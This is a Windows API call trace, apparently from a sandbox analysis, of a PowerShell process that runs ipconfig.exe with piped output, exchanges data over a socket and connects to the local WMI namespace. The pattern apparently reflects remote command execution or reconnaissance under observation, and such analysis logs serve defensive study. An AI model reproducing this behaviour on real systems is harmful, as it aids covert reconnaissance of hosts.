	[0213.999] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\ipconfig.COM", lpFindFileData=0x1c68c5e0 | out: lpFindFileData=0x1c68c5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0213.999] SetErrorMode (uMode=0x1) returned 0x1
	[0213.999] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c68c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0214.000] SetErrorMode (uMode=0x1) returned 0x1
	[0214.000] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\ipconfig.EXE", lpFindFileData=0x1c68c5e0 | out: lpFindFileData=0x1c68c5e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89a21ae5, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x89a21ae5, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xe460dc40, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xe400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipconfig.exe", cAlternateFileName="")) returned 0x1b86a020
	[0214.003] FindNextFileW (in: hFindFile=0x1b86a020, lpFindFileData=0x1c68c5f0 | out: lpFindFileData=0x1c68c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89a21ae5, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x89a21ae5, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xe460dc40, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xe400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipconfig.exe", cAlternateFileName="")) returned 0
	[0214.003] FindClose (in: hFindFile=0x1b86a020 | out: hFindFile=0x1b86a020) returned 1
	[0214.003] SetErrorMode (uMode=0x1) returned 0x1
	[0214.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\ipconfig.exe", nBufferLength=0x105, lpBuffer=0x1c68c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\ipconfig.exe", lpFilePart=0x0) returned 0x20
	[0214.006] SetErrorMode (uMode=0x1) returned 0x1
	[0214.006] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\ipconfig.exe" (normalized: "c:\\windows\\system32\\ipconfig.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c68c910 | out: lpFileInformation=0x1c68c910*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89a21ae5, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x89a21ae5, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xe460dc40, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xe400)) returned 1
	[0214.006] SetErrorMode (uMode=0x1) returned 0x1
	[0214.009] CoTaskMemAlloc (cb=0x104) returned 0x1b87def0
	[0214.009] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b87def0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0214.009] CoTaskMemFree (pv=0x1b87def0) 
	[0214.012] CoTaskMemAlloc (cb=0x104) returned 0x1b87def0
	[0214.012] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b87def0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0214.012] CoTaskMemFree (pv=0x1b87def0) 
	[0214.254] CoTaskMemAlloc (cb=0x104) returned 0x1b87def0
	[0214.254] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b87def0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0214.254] CoTaskMemFree (pv=0x1b87def0) 
	[0214.975] CoTaskMemAlloc (cb=0x22) returned 0x1b8860d0
	[0214.976] SHGetFileInfoA (in: pszPath="C:\\Windows\\system32\\ipconfig.exe", dwFileAttributes=0x0, psfi=0x1c68caf8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c68caf8) returned 0x4550
	[0215.408] CoTaskMemFree (pv=0x1b8860d0) 
	[0215.412] GetConsoleWindow () returned 0x40298
	[0215.443] CoTaskMemAlloc (cb=0x104) returned 0x1b87def0
	[0215.443] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b87def0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0215.443] CoTaskMemFree (pv=0x1b87def0) 
	[0215.444] CoTaskMemAlloc (cb=0x104) returned 0x1b87def0
	[0215.444] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b87def0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0215.444] CoTaskMemFree (pv=0x1b87def0) 
	[0215.453] CoTaskMemAlloc (cb=0x104) returned 0x1b87def0
	[0215.453] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b87def0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0215.453] CoTaskMemFree (pv=0x1b87def0) 
	[0215.456] CommandLineToArgvW (in: lpCmdLine="", pNumArgs=0x1c68cb40 | out: pNumArgs=0x1c68cb40) returned 0x1b82fcd0*="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
	[0215.457] LocalFree (hMem=0x1b82fcd0) returned 0x0
	[0215.611] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0215.613] CreatePipe (in: hReadPipe=0x1c68cac0, hWritePipe=0x1c68cab8, lpPipeAttributes=0x1c68ca90, nSize=0x0 | out: hReadPipe=0x1c68cac0*=0x4e8, hWritePipe=0x1c68cab8*=0x4f0) returned 1
	[0215.614] GetCurrentProcess () returned 0xffffffffffffffff
	[0215.614] GetCurrentProcess () returned 0xffffffffffffffff
	[0215.615] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x4e8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c68cb38, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c68cb38*=0x4f4) returned 1
	[0215.615] CloseHandle (hObject=0x4e8) returned 1
	[0215.615] CreatePipe (in: hReadPipe=0x1c68cac0, hWritePipe=0x1c68cab8, lpPipeAttributes=0x1c68ca90, nSize=0x0 | out: hReadPipe=0x1c68cac0*=0x4e8, hWritePipe=0x1c68cab8*=0x4f8) returned 1
	[0215.615] GetCurrentProcess () returned 0xffffffffffffffff
	[0215.615] GetCurrentProcess () returned 0xffffffffffffffff
	[0215.615] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x4e8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c68cb38, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c68cb38*=0x4fc) returned 1
	[0215.616] CloseHandle (hObject=0x4e8) returned 1
	[0215.617] CoTaskMemAlloc (cb=0x88) returned 0x1b82fcd0
	[0215.617] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\ipconfig.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c68caa0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x4f0, hStdError=0x4f8), lpProcessInformation=0x3130ef8 | out: lpCommandLine="\"C:\\Windows\\system32\\ipconfig.exe\"", lpProcessInformation=0x3130ef8*(hProcess=0x500, hThread=0x4e8, dwProcessId=0xc64, dwThreadId=0xc68)) returned 1
	[0215.623] CoTaskMemFree (pv=0x1b82fcd0) 
	[0215.623] CloseHandle (hObject=0x4f0) returned 1
	[0215.623] CloseHandle (hObject=0x4f8) returned 1
	[0215.624] GetConsoleOutputCP () returned 0x1b5
	[0215.739] GetFileType (hFile=0x4f4) returned 0x3
	[0215.739] GetConsoleOutputCP () returned 0x1b5
	[0215.739] GetFileType (hFile=0x4fc) returned 0x3
	[0215.741] CloseHandle (hObject=0x4e8) returned 1
	[0215.757] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4e8
	[0215.757] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x4f0
	[0215.757] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x508
	[0215.757] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x504
	[0217.012] SetEvent (hEvent=0x4e8) returned 1
	[0217.012] SetEvent (hEvent=0x4f0) returned 1
	[0217.042] SetEvent (hEvent=0x4e8) returned 1
	[0217.042] SetEvent (hEvent=0x4f0) returned 1
	[0217.046] SetEvent (hEvent=0x4f0) returned 1
	[0217.606] SetEvent (hEvent=0x4e8) returned 1
	[0217.606] SetEvent (hEvent=0x4f0) returned 1
	[0217.609] SetEvent (hEvent=0x4e8) returned 1
	[0217.610] SetEvent (hEvent=0x4f0) returned 1
	[0217.611] SetEvent (hEvent=0x4e8) returned 1
	[0217.611] SetEvent (hEvent=0x4f0) returned 1
	[0217.611] SetEvent (hEvent=0x4e8) returned 1
	[0217.611] SetEvent (hEvent=0x4f0) returned 1
	[0217.612] SetEvent (hEvent=0x4e8) returned 1
	[0217.612] SetEvent (hEvent=0x4f0) returned 1
	[0217.612] SetEvent (hEvent=0x4f0) returned 1
	[0218.097] SetEvent (hEvent=0x4f0) returned 1
	[0218.102] SetEvent (hEvent=0x4f0) returned 1
	[0218.107] SetEvent (hEvent=0x4e8) returned 1
	[0218.107] SetEvent (hEvent=0x4f0) returned 1
	[0218.111] SetEvent (hEvent=0x4e8) returned 1
	[0218.111] SetEvent (hEvent=0x4f0) returned 1
	[0218.111] SetEvent (hEvent=0x4f0) returned 1
	[0218.113] SetEvent (hEvent=0x4f0) returned 1
	[0218.115] SetEvent (hEvent=0x4f0) returned 1
	[0218.118] SetEvent (hEvent=0x4e8) returned 1
	[0218.118] SetEvent (hEvent=0x4f0) returned 1
	[0218.119] SetEvent (hEvent=0x4e8) returned 1
	[0218.119] SetEvent (hEvent=0x4f0) returned 1
	[0218.119] SetEvent (hEvent=0x4f0) returned 1
	[0218.120] SetEvent (hEvent=0x4f0) returned 1
	[0218.122] SetEvent (hEvent=0x4f0) returned 1
	[0218.137] GetCurrentProcess () returned 0xffffffffffffffff
	[0218.137] GetCurrentProcess () returned 0xffffffffffffffff
	[0218.137] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x500, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c68cc28, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c68cc28*=0x52c) returned 1
	[0218.139] CloseHandle (hObject=0x52c) returned 1
	[0218.143] GetExitCodeProcess (in: hProcess=0x500, lpExitCode=0x1c68cc98 | out: lpExitCode=0x1c68cc98*=0x0) returned 1
	[0218.147] CloseHandle (hObject=0x500) returned 1
	[0218.151] send (s=0x408, buf=0x30249a0*, len=37, flags=0) returned 37
	[0218.151] recv (in: s=0x408, buf=0x2f36670, len=502, flags=0 | out: buf=0x2f36670*) returned 376
	[0218.154] VirtualQuery (in: lpAddress=0x1c68c8a0, lpBuffer=0x1c68d760, dwLength=0x30 | out: lpBuffer=0x1c68d760*(BaseAddress=0x1c68c000, AllocationBase=0x1bd00000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0218.164] CoTaskMemAlloc (cb=0x104) returned 0x1b87d120
	[0218.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b87d120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.164] CoTaskMemFree (pv=0x1b87d120) 
	[0218.624] CoTaskMemAlloc (cb=0x104) returned 0x1b87d120
	[0218.624] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b87d120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.624] CoTaskMemFree (pv=0x1b87d120) 
	[0219.676] CoGetObjectContext (in: riid=0x1c68cbb8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68cbb0 | out: ppv=0x1c68cbb0*=0x221868) returned 0x0
	[0219.676] IComThreadingInfo:GetCurrentApartmentType (in: This=0x221868, pAptType=0x1c68cbd0 | out: pAptType=0x1c68cbd0*=1) returned 0x0
	[0219.676] IUnknown:QueryInterface (in: This=0x221868, riid=0x2efe148*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c68ccd8 | out: ppvObject=0x1c68ccd8*=0x0) returned 0x80004002
	[0219.676] IUnknown:Release (This=0x221868) returned 0x1
	[0219.679] CoGetClassObject (in: rclsid=0x2756a8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68c240 | out: ppv=0x1c68c240*=0x1cc31dc0) returned 0x0
	[0219.679] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc31dc0, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68bf50 | out: ppvObject=0x1c68bf50*=0x0) returned 0x80004002
	[0219.679] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cc31dc0, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bf38 | out: ppvObject=0x1c68bf38*=0x1cc360a0) returned 0x0
	[0219.679] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc360a0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68be40 | out: ppvObject=0x1c68be40*=0x1cc360a0) returned 0x0
	[0219.680] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc360a0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68bec0 | out: ppvObject=0x1c68bec0*=0x0) returned 0x80004002
	[0219.680] WbemDefPath:IUnknown:AddRef (This=0x1cc360a0) returned 0x3
	[0219.680] CoGetContextToken (in: pToken=0x1c68bb10 | out: pToken=0x1c68bb10) returned 0x0
	[0219.680] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc360a0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bad0 | out: ppvObject=0x1c68bad0*=0x1b893a90) returned 0x0
	[0219.680] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b893a90, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bb00 | out: pCid=0x1c68bb00*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0219.680] WbemDefPath:IUnknown:Release (This=0x1b893a90) returned 0x3
	[0219.681] CoGetContextToken (in: pToken=0x1c68bae0 | out: pToken=0x1c68bae0) returned 0x0
	[0219.681] WbemDefPath:IUnknown:AddRef (This=0x1cc360a0) returned 0x4
	[0219.681] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc360a0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bbf8 | out: ppvObject=0x1c68bbf8*=0x0) returned 0x80004002
	[0219.681] WbemDefPath:IUnknown:Release (This=0x1cc360a0) returned 0x3
	[0219.681] WbemDefPath:IUnknown:Release (This=0x1cc360a0) returned 0x2
	[0219.681] WbemDefPath:IUnknown:Release (This=0x1cc31dc0) returned 0x0
	[0219.681] WbemDefPath:IUnknown:Release (This=0x1cc360a0) returned 0x1
	[0219.681] CoGetContextToken (in: pToken=0x1c68c810 | out: pToken=0x1c68c810) returned 0x0
	[0219.681] CoGetContextToken (in: pToken=0x1c68c750 | out: pToken=0x1c68c750) returned 0x0
	[0219.681] WbemDefPath:IUnknown:AddRef (This=0x1cc360a0) returned 0x2
	[0219.681] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc360a0, riid=0x1c68c890*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c870 | out: ppvObject=0x1c68c870*=0x1cc360a0) returned 0x0
	[0219.682] WbemDefPath:IUnknown:Release (This=0x1cc360a0) returned 0x2
	[0219.682] WbemDefPath:IUnknown:Release (This=0x1cc360a0) returned 0x1
	[0219.682] CoGetContextToken (in: pToken=0x1c68c990 | out: pToken=0x1c68c990) returned 0x0
	[0219.682] CoGetContextToken (in: pToken=0x1c68c8d0 | out: pToken=0x1c68c8d0) returned 0x0
	[0219.682] WbemDefPath:IUnknown:AddRef (This=0x1cc360a0) returned 0x2
	[0219.682] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc360a0, riid=0x1c68ca10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c9f0 | out: ppvObject=0x1c68c9f0*=0x1cc360a0) returned 0x0
	[0219.682] WbemDefPath:IUnknown:Release (This=0x1cc360a0) returned 0x2
	[0219.682] WbemDefPath:IUnknown:AddRef (This=0x1cc360a0) returned 0x3
	[0219.682] WbemDefPath:IWbemPath:SetText (This=0x1cc360a0, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0219.682] WbemDefPath:IUnknown:Release (This=0x1cc360a0) returned 0x2
	[0219.682] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc360a0, puCount=0x1c68cca0 | out: puCount=0x1c68cca0*=0x2) returned 0x0
	[0219.682] WbemDefPath:IWbemPath:GetText (in: This=0x1cc360a0, lFlags=4, puBuffLength=0x1c68cca0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cca0*=0x17, pszText=0x0) returned 0x0
	[0219.683] WbemDefPath:IWbemPath:GetText (in: This=0x1cc360a0, lFlags=4, puBuffLength=0x1c68cca0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cca0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0219.683] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc360a0, puCount=0x1c68cc50 | out: puCount=0x1c68cc50*=0x2) returned 0x0
	[0219.683] WbemDefPath:IWbemPath:GetText (in: This=0x1cc360a0, lFlags=4, puBuffLength=0x1c68cc50*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cc50*=0x17, pszText=0x0) returned 0x0
	[0219.683] WbemDefPath:IWbemPath:GetText (in: This=0x1cc360a0, lFlags=4, puBuffLength=0x1c68cc50*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cc50*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0219.683] CoGetObjectContext (in: riid=0x1c68cb88*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68cb80 | out: ppv=0x1c68cb80*=0x221868) returned 0x0
	[0219.683] IComThreadingInfo:GetCurrentApartmentType (in: This=0x221868, pAptType=0x1c68cba0 | out: pAptType=0x1c68cba0*=1) returned 0x0
	[0219.683] IUnknown:QueryInterface (in: This=0x221868, riid=0x2efe148*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c68cca8 | out: ppvObject=0x1c68cca8*=0x0) returned 0x80004002
	[0219.683] IUnknown:Release (This=0x221868) returned 0x1
	[0219.683] CoGetClassObject (in: rclsid=0x1b8749f8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68c830 | out: ppv=0x1c68c830*=0x1cc3e120) returned 0x0
	[0219.683] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3e120, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c540 | out: ppvObject=0x1c68c540*=0x0) returned 0x80004002
	[0219.684] WbemLocator:IClassFactory:CreateInstance (in: This=0x1cc3e120, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c528 | out: ppvObject=0x1c68c528*=0x1cc3e140) returned 0x0
	[0219.684] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3e140, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c430 | out: ppvObject=0x1c68c430*=0x1cc3e140) returned 0x0
	[0219.684] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3e140, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c4b0 | out: ppvObject=0x1c68c4b0*=0x0) returned 0x80004002
	[0219.684] WbemLocator:IUnknown:AddRef (This=0x1cc3e140) returned 0x3
	[0219.684] CoGetContextToken (in: pToken=0x1c68c100 | out: pToken=0x1c68c100) returned 0x0
	[0219.684] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3e140, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c0c0 | out: ppvObject=0x1c68c0c0*=0x0) returned 0x80004002
	[0219.685] CoGetContextToken (in: pToken=0x1c68c0d0 | out: pToken=0x1c68c0d0) returned 0x0
	[0219.685] WbemLocator:IUnknown:AddRef (This=0x1cc3e140) returned 0x4
	[0219.685] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3e140, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c1e8 | out: ppvObject=0x1c68c1e8*=0x0) returned 0x80004002
	[0219.685] WbemLocator:IUnknown:Release (This=0x1cc3e140) returned 0x3
	[0219.685] WbemLocator:IUnknown:Release (This=0x1cc3e140) returned 0x2
	[0219.685] WbemLocator:IUnknown:Release (This=0x1cc3e120) returned 0x0
	[0219.685] WbemLocator:IUnknown:Release (This=0x1cc3e140) returned 0x1
	[0219.685] CoGetContextToken (in: pToken=0x1c68c6f0 | out: pToken=0x1c68c6f0) returned 0x0
	[0219.685] CoGetContextToken (in: pToken=0x1c68c630 | out: pToken=0x1c68c630) returned 0x0
	[0219.685] WbemLocator:IUnknown:AddRef (This=0x1cc3e140) returned 0x2
	[0219.685] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3e140, riid=0x1c68c770*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c68c750 | out: ppvObject=0x1c68c750*=0x1cc3e140) returned 0x0
	[0219.686] WbemLocator:IUnknown:Release (This=0x1cc3e140) returned 0x2
	[0219.686] WbemLocator:IUnknown:Release (This=0x1cc3e140) returned 0x1
	[0219.686] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc360a0, puCount=0x1c68cb50 | out: puCount=0x1c68cb50*=0x2) returned 0x0
	[0219.686] WbemDefPath:IWbemPath:GetText (in: This=0x1cc360a0, lFlags=8, puBuffLength=0x1c68cb50*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cb50*=0x17, pszText=0x0) returned 0x0
	[0219.686] WbemDefPath:IWbemPath:GetText (in: This=0x1cc360a0, lFlags=8, puBuffLength=0x1c68cb50*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cb50*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0219.686] CoCreateInstance (in: rclsid=0x642ffff15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x642ffff14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1c68c840 | out: ppv=0x1c68c840*=0x1cc3e160) returned 0x0
	[0219.686] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1cc3e160, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x1c68cad0 | out: ppNamespace=0x1c68cad0*=0x1cc3b2b8) returned 0x0
	[0220.287] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3b2b8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c6b8 | out: ppvObject=0x1c68c6b8*=0x1b86e520) returned 0x0
